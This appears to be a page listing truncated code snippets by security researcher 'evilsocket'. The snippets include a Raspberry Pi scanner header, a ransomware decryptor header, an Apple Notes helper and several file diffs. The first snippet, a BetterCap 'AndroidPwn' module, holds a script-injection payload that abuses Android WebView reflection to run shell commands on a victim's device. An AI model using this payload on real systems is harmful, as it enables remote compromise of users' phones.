evilsocket

class AndroidPwn < BetterCap::Proxy::Module  
  @@command = nil
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              " try {\n" +
              "   top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
              "   break;\n" +
              " }\n" +
              "catch(e) {}\n" +

evilsocket

#!/bin/bash
#
# Periodically scan your network searching for your
# Raspberry Pi board and update your /etc/hosts file
# with its ip address.
#
# Copyleft by Simone 'evilsocket' Margaritelli
# http://www.evilsocket.net
# evilsocket at gmail dot com
#

evilsocket

Keybase proof

I hereby claim:

• I am evilsocket on github.
• I am evilsocket (https://keybase.io/evilsocket) on keybase.
• I have a public key ASDQOex7WfTVV8cumbapyzHyv-NXXay_D0-RfJwOH8xKrQo

To claim this, I am signing this object:

evilsocket

class Example < BetterCap::Proxy::TCP::Module
  meta(
    'Name'        => 'Example',
    'Description' => 'Example TCP proxy module.',
    'Version'     => '1.0.0',
    'Author'      => "Simone 'evilsocket' Margaritelli",
    'License'     => 'GPL3'
  )
  
  # Received when the victim is sending data to the upstream server.

evilsocket

package main

import (
	"encoding/json"
	"fmt"
	"io/ioutil"
	"math/rand"
	"net/http"
	"net/url"
	"strings"

evilsocket

/*
 * This tool will decrypt files encrypted by the Magniber ransomware with
 * AES128 ( CBC mode ) algorithm.
 *
 * RE and report by MalwareBytes ( @hasherezade )
 *
 *  https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/
 *
 * Decryptor written by Simone 'evilsocket' Margaritelli
 *  

evilsocket

def get_apple_note_contents(account = 'iCloud', folder = 'Notes', note = 'Routine', strip_tags = True, as_lines = True):
	import subprocess
	import os
	import tempfile
	import re

	script = """
	tell application "Notes"
		tell account "%s"
			tell folder "%s"

evilsocket

--- /var/folders/6g/yj20jtln2qbbfbg5_lhj_lg40000gn/T/tmprr9h5hoe	2022-11-07 15:07:12.000000000 +0100
+++ /var/folders/6g/yj20jtln2qbbfbg5_lhj_lg40000gn/T/tmp1s9xlrwt	2022-11-07 15:07:12.000000000 +0100
@@ -1,3 +1,3 @@
 a
-a
+b
 a
\ No newline at end of file

evilsocket

--- /var/folders/6g/yj20jtln2qbbfbg5_lhj_lg40000gn/T/tmpagj_091d	2022-11-07 15:08:50.000000000 +0100
+++ /var/folders/6g/yj20jtln2qbbfbg5_lhj_lg40000gn/T/tmpexymodh2	2022-11-07 15:08:50.000000000 +0100
@@ -1411,7 +1411,7 @@
   <p>You retain your rights to any Content you submit, post or display on or through the Services. What’s yours is yours — you own your Content (and your incorporated audio, photos and videos are considered part of the Content).<br />
 <br />
 </p>
-<p>By submitting, posting or displaying Content on or through the Services, you grant us a worldwide, non-exclusive, royalty-free license (with the right to sublicense) to use, copy, reproduce, process, adapt, modify, publish, transmit, display and distribute such Content in any and all media or distribution methods now known or later developed (for clarity, these rights include, for example, curating, transforming, and translating). This license authorizes us to make your Content available to the rest of the world and to let others do the

evilsocket

--- /var/folders/6g/yj20jtln2qbbfbg5_lhj_lg40000gn/T/tmpjhff6ae0	2022-11-07 16:24:55.000000000 +0100
+++ /var/folders/6g/yj20jtln2qbbfbg5_lhj_lg40000gn/T/tmpbodjyi1o	2022-11-07 16:24:55.000000000 +0100
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 
 
-<html lang="en" dir="ltr" prefix="og: http://ogp.me/ns#" data-behavior="i18n" data-environment="prod" data-server-mode="publish" data-dc="a">
+<html lang="en" dir="ltr" prefix="og: http://ogp.me/ns#" data-behavior="i18n" data-environment="prod" data-server-mode="publish" data-dc="s">
   <head>
     <meta charset="utf-8"/>